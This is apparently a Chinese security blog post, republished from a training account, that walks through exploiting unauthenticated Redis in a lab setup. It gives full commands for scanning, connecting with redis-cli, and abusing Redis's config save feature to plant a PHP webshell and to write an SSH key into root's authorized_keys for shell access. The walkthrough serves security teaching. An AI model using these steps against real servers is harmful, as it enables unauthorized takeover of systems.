redis未授权访问漏洞的利用

admin 2024年2月9日14:40:25评论19 views字数 1367阅读4分33秒阅读模式

扫码领资料

获网安教程

免费&进群

redis未授权访问漏洞的利用

redis未授权访问漏洞的利用

本文由掌- 逍遥子稿

当redis服务(6379)端口对外开放且未作密码认证时,任意用户可未授权访问redis服务并操作获取其数据。
攻击机:10.1.1.100 kali
目标靶机:10.1.1.200
一、探测redis的未授权访问
首先在攻击机上使用nmap对目标机进行扫描,探测开放的服务与端口。
使用全端口扫描,探测存在的服务: nmap -p- -sV 10.1.1.200

redis未授权访问漏洞的利用
探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞。
下载redis连接工具,解压后使用make命令进行编译。

redis未授权访问漏洞的利用
编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。

redis未授权访问漏洞的利用
使用redis-cli工具对redis数据尝试进行连接。
redis-cli -h 10.1.1.200 -p 6379

redis未授权访问漏洞的利用
连接成功,这个地方存在一个未授权访问。

二、利用未授权访问漏洞写入一句话木马。
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。

redis未授权访问漏洞的利用
使用dirsearch工具进行目录的探测,发现还存在一个phpinfo目录。

redis未授权访问漏洞的利用

redis未授权访问漏洞的利用
看到了网站的根目录

redis未授权访问漏洞的利用
利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。
config set dir <路径> #设置备份路径
config set dbfilename <文件名> #设置备份文件的名字
set <key> <value> #写入数据
save #保存

redis未授权访问漏洞的利用
访问目标,拿到webshell

redis未授权访问漏洞的利用

三、利用redis未授权访问写入ssh公钥获取shell
先生成ssh的公钥,公钥文件一般保存在/root/.ssh目录下
ssh-keygen -t rsa

redis未授权访问漏洞的利用
将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
(echo -e “nn”; cat ~/.ssh/id_rsa.pub; echo -e “nn”) > /tmp/foo.txt

redis未授权访问漏洞的利用
将公钥信息写入到目标靶机
cat /tmp/foo.txt | redis-cli -h 10.1.1.200 -p 6379 -x set sshkey

redis未授权访问漏洞的利用
再一次利用备份功能写入公钥的备份文件。
config set dir /root/.ssh
config set dbfilename authorized_keys
save

redis未授权访问漏洞的利用
使用ssh连接方式:ssh [email protected] -i /root/.ssh/id_rsa

redis未授权访问漏洞的利用
成功获取到shell。

.

redis未授权访问漏洞的利用

~

+++

redis未授权访问漏洞的利用

Xray

cs4.0使

|CNVD

SRC++

|IP

redis未授权访问漏洞的利用

+~~

原文始发于微信公众号(掌控安全EDU):redis未授权访问漏洞的利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月9日14:40:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   redis未授权访问漏洞的利用https://cn-sec.com/archives/2210846.html

发表评论

匿名网友 填写信息